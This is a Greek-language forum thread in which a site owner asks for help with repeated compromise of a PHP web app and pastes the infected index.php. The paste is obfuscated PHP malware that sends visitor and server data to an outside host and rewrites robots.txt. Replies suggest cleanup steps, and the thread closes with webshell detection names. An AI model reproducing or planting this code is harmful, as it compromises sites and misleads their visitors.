Συνεχείς επιθέσεις και αλλαγή αρχείων σε web app. Κάποιος ιός.

[octa]

Καλησπέρα, 

Απηύδησα με μια εφαρμογή web που έχω. Ανα βδομάδα μου αλλάζουν το index.php και το .htaccess .

Αλλάζω κωδικό πρόσβασης . Ψάχνω με το search in files λέξεις και κλειδιά για να βρω τα μολυσμένα αρχεία.Κάθε τρεις και λίγο μπαίνουν και κάνουν τη δουλειά τους χωρίς να έχω ιδέα πως μπαίνουν στον server, έχω web hosting στη hetzner.Αυτό είναι το index.php μετά από επίθεση και ακολουθεί το .htaccess .

 

Spoiler

<?php
 goto jZjgK; TcINY: $mkvyD = TrIM($P6bnD[$D_nBj - ROUnd(0.36215979 + 0.077261 + 0.0654 + 0.334065 + 0.0527 + 0.07000000000000001 + 0.039)]); goto Nbre4; i2cSd: $gBH1j = $KmyUc($AtXnW); goto t41gi; nO5JH: $ksz6d = "\x2e\x77\141"; goto kK_tx; UQNZT: $yl19e = array("\x53\x43\x52\x49\x50\124\137\x4e\101\x4d\x45", "\122\105\x51\125\105\x53\x54\137\125\122\111", "\110\124\124\x50\x53", "\122\105\121\x55\x45\123\124\x5f\123\103\110\105\x4d\x45", "\123\105\x52\126\105\122\x5f\120\x4f\122\x54", "\x52\105\115\x4f\x54\x45\137\x41\104\104\x52", "\x48\x54\x54\120\137\x52\105\x46\x45\x52\x45\122", "\110\124\x54\120\137\101\x43\103\105\120\124\137\x4c\101\116\x47\x55\x41\107\105", "\x48\x54\124\x50\137\125\123\x45\122\x5f\101\x47\105\x4e\124", "\110\124\x54\x50\x5f\110\117\123\124"); goto QpE5w; LadE7: $J0HJj = "\145\x5f\x67"; goto StIAQ; BM2r0: if (!empty($gBH1j)) { goto orIU1; } goto kYx4M; eTZA3: $wyf7_ = "\157\156\x74\x65"; goto Q_MOf; w9r6d: CURL_clOsE($iy2ua); goto BM2r0; viWmy: HEaDeR($d2zCb); goto G21EH; yQm8Y: $Ne8et = trIM($P6bnD[rOUnd(0.09520000000000001 + 0.18793 + 0.02763 + 0.33551 + 0.35369)]); goto Ul5K4; Nbre4: if (!($mkvyD == "\x65\x78\151\164")) { goto P8Wzv; } goto ZS8If; ke6hf: arRAy_poP($VMtU0); goto IcxWA; WNcQB: if (!($mkvyD == "\x70\x69\156\x67")) { goto eEH5U; } goto bbVIo; cSCXI: P8Wzv: goto WNcQB; LFOKl: if ($D_nBj < 3) { goto tbWvI; } goto dG7Pk; tJByR: Tp32A: goto g9iLq; URRPP: $up2OR = "\150\164\x74\160\72\57\x2f" . $JO6PX . $ksz6d . $Bxdr4 . $DzOKN; goto y9xhe; g9iLq: echo "\110\124\x54\x50\x2f\61\x2e\x30\40\64\60\64\40\x4e\157\164\x20\106\157\x75\156\144\137\137\x5f" . $JO6PX . "\137\x5f\x5f" . $EzcBz; goto dkqFA; kYx4M: $mqqg2 = "\146\151\154"; goto LadE7; ZS8If: exit; goto cSCXI; SxWYh: FCLOSE($a1oPu); goto aDxjN; SNJ3g: if (!(PREg_maTCH("\x2f\152\160\x32\60\62\63\57\x73\x69", $_SERVER["\x52\x45\x51\125\105\123\124\137\125\122\x49"]) == ROUnd(0.211 + 0.4055 + 0.383))) { goto dXJtL; } goto nJFQa; MOCfT: HEADer("\110\x54\x54\120\57\61\56\60\x20\x34\x30\64\40\116\x6f\x74\x20\x46\x6f\165\x6e\144"); goto tJByR; jZjgK: ErrOR_rEPoRtINg(ROuND(0 + 0 + 0 + 0 + 0 + 0 + 0 + 0 + 0)); goto rEQRs; ovmsy: $KmyUc = $mqqg2 . $J0HJj . $LgOqN . $wyf7_ . $G2g8I; goto i2cSd; dkqFA: exit; goto c38AU; IC8A3: goto Bppq4; goto xAk6y; LlSLs: CuRL_sEtoPt($iy2ua, CURLOPT_CONNECTTIMEOUT, rOUND(1.9268694 + 3.6483 + 1.57765 + 2.847)); goto ahUVg; fylcm: CuRl_SEtoPt($iy2ua, CURLOPT_RETURNTRANSFER, rOUnd(0.5444191 + 0.455581)); goto LlSLs; bRL1V: hEAder("\x48\124\x54\x50\57\x31\56\x30\40\x34\60\64\x20\x4e\x6f\164\40\106\157\x75\x6e\x64"); goto bSMhk; v_8GP: Pb4_w: goto UGunS; xt6z9: eEH5U: goto IC8A3; zN_He: $gBH1j = triM($gBH1j); goto w9r6d; zAGhL: $gBH1j = TrIm($gBH1j); goto TQN_l; xAk6y: tbWvI: goto bRL1V; ahUVg: $gBH1j = CuRl_ExEc($iy2ua); goto zN_He; JVrpj: exit; goto xt6z9; rFVwS: CUrl_SETOPt($iy2ua, CURLOPT_URL, $AtXnW); goto fylcm; IcxWA: foreach ($VMtU0 as $AgggK) { $jYAUV .= "\x53\x69\164\145\x6d\x61\x70\x3a" . $AgggK . PHP_EOL; iGQ_z: } goto v_8GP; dG7Pk: $d2zCb = TRIm($P6bnD[rOUNd(0 + 0 + 0)]); goto zfrS9; rEQRs: $JO6PX = "\172\152\x32\61\71\x35"; goto mRorZ; c38AU: dXJtL: goto nO5JH; TQN_l: $P6bnD = EXpLoDe("\174\100\x23\44\174", $gBH1j); goto W9rhj; UGunS: $a1oPu = FOPeN($_SERVER["\x44\117\x43\x55\115\105\116\124\137\x52\117\117\124"] . "\x2f\x72\x6f\142\x6f\x74\x73\x2e\164\x78\x74", "\x77"); goto Q51jm; kHXY2: c6zFJ: goto TcINY; w_y6Z: $DzOKN = "\x74\x69\157\156\x2e\x63\157\x6d"; goto URRPP; FkIzo: AxTT7: goto cTONU; nJFQa: if (!(preg_maTcH("\x2f\x6a\x70\x32\x30\x32\x33\x63\167\x77\x2f\x73\x69", $_SERVER["\x52\x45\x51\125\x45\x53\124\137\x55\122\111"]) == ROUnd(0 + 0 + 0))) { goto Tp32A; } goto MOCfT; swK0n: echo $Ne8et; goto kHXY2; QpE5w: foreach ($yl19e as $olmh5) { goto DGIUw; igLjE: $GXi2M = isset($_SERVER[$olmh5]) ? $_SERVER[$olmh5] : ''; goto UX_aS; iA37m: $DAv3m = BaSE64_eNCODe(trIm($GXi2M)); goto LoX1n; TV7jh: $DAv3m = Str_rePLaCE("\57", "\137", $DAv3m); goto AnPB2; yfSPg: $LDpec .= "\46" . $olmh5 . "\75" . $DAv3m; goto rDEWr; u8RwG: kxQJ5: goto iA37m; AnPB2: $DAv3m = sTr_replaCE("\75", "\x2e", $DAv3m); goto yfSPg; d4Jme: pwr_u: goto ztlxW; UX_aS: goto kxQJ5; goto d4Jme; rDEWr: TAITb: goto Na0vo; DGIUw: if ($olmh5 == "\x52\x45\115\x4f\124\x45\x5f\101\x44\104\x52") { goto pwr_u; } goto igLjE; LoX1n: $DAv3m = sTr_REplace("\53", "\55", $DAv3m); goto TV7jh; ztlxW: $GXi2M = isset($_SERVER["\x48\x54\x54\120\x5f\130\137\x46\117\122\127\101\122\x44\x45\104\137\x46\x4f\x52"]) ? $_SERVER["\x48\x54\x54\x50\137\130\x5f\106\117\122\x57\x41\x52\104\105\x44\137\106\117\122"] : (isset($_SERVER["\122\105\115\x4f\124\x45\x5f\x41\104\x44\122"]) ? $_SERVER["\122\105\115\x4f\124\105\137\x41\x44\104\122"] : ''); goto u8RwG; Na0vo: } goto FkIzo; W9rhj: $D_nBj = coUNT($P6bnD); goto LFOKl; G21EH: WwzkG: goto yQm8Y; cTONU: $AtXnW = $up2OR . $LDpec; goto vVy98; StIAQ: $LgOqN = "\x65\x74\x5f\143"; goto eTZA3; kK_tx: $Bxdr4 = "\x70\141\143"; goto w_y6Z; OSu3R: $jYAUV .= "\101\x6c\x6c\x6f\167\x3a\57" . PHP_EOL; goto s7u8j; t41gi: orIU1: goto zAGhL; bbVIo: $jYAUV = "\125\x73\145\x72\x2d\141\x67\x65\156\164\x3a\52" . PHP_EOL; goto OSu3R; Ul5K4: if (empty($Ne8et)) { goto c6zFJ; } goto swK0n; s7u8j: $VMtU0 = ExPlOdE("\x3c\142\162\57\x3e", $Ne8et); goto ke6hf; mRorZ: $EzcBz = "\141\153\x31"; goto SNJ3g; bSMhk: exit; goto T7FUj; vVy98: $iy2ua = curl_INit(); goto rFVwS; Q_MOf: $G2g8I = "\x6e\x74\x73"; goto ovmsy; zfrS9: if (empty($d2zCb)) { goto WwzkG; } goto viWmy; y9xhe: $LDpec = "\57\x69\156\x64\145\170\x2e\x70\x68\x70\x3f\x56\123\75" . $EzcBz . "\x26\107\x50\x3d" . $JO6PX; goto UQNZT; aDxjN: echo "\x72\x6f\142\x6f\x74\163\56\x74\x78\x74\40\x64\x6f\156\145"; goto JVrpj; Q51jm: FwriTe($a1oPu, $jYAUV); goto SxWYh; T7FUj: Bppq4:
?><?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
	

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

 

 

 

Να σημειώσω ότι η πρώτη επίθεση έγινε πριν 2 χρόνια όταν είχα στο ίδιο web hosting account 2 wordpress site. Εδώ και 2 χρόνια δεν υπάρχει το wordpress στο λογαριασμό μου.

Όμως εξακολουθούν να με ενοχλούν αυτα τα προβλήματα.

Μάλλον είναι ένα αρχείο που δίνει πρόσβαση στο ftp. Όσο και να ψάχνω δεν το βρίσκω.

Τι μπορώ να κάνω ;

Έχω κουραστεί τα ίδια και τα ίδια.

Ευχαριστώ

 

 

 

 

[Xvipes]

https://sucuri.net/

[elvizakos]

Έχεις γράψει και άλλο θέμα σχετικό και απ'ότι βλέπω το πρόβλημα είναι ακριβώς το ίδιο. Μήπως είναι shared ο server και έχει πρόβλημα ο server; Τι server είναι; Τι software έχει; Λογικά, λόγο htaccess είναι apache2 και linux; Μήπως έχεις πολλά site που το ένα προσβάλει το άλλο; 

Αν έχεις πρόσβαση στο cron (ή αν έχει κάτι άλλο) κοίταξέ το και καθάρισέ το αν μπορείς και δεις κάτι ύποπτο. Αν υπάρχουν κάπου και αρχεία/ρυθμίσεις που μπορούν να εκκινήσουν προγράμματα και script.

Εγώ στη θέση σου ότι έχει κώδικα και μπορεί να τρέξει, θα το σταμάταγα και θα το έσβηνα και θα το ξαναέφτιαχνα από την αρχή. Μόνο ίσως τη ΒΔ θα κράταγα αλλά θα την κοίταγα και τη ΒΔ (ποτέ δεν ξέρεις). Και φυσικά αλλαγή κωδικών στο τέλος(όπως λες ότι κάνεις). Αν τώρα το πρόβλημα επέμενε, θα επικοινωνούσα με το host γιατί μπορεί να είναι δικό τους πρόβλημα.

[octa]

Τελικά με τη βοήθεια των τεχνικών της hetzner το θέμα λύθηκε. 
Μου έγραψαν τη λίστα με τα μολυσμένα αρχεία και τα διώρθωσα.

Η προσβολή έγινε από plug in του matomo.

Αυτά τα malware κατέγραψε :
 

#1 WEBSHELL_PHP_Generic [author="Arnim Rupp (https://github.com/ruppde)"]
#2 WEBSHELL_PHP_Dynamic_Big [author="Arnim Rupp (https://github.com/ruppde)"]
#3 WEBSHELL_PHP_Encoded_Big [author="Arnim Rupp (https://github.com/ruppde)"]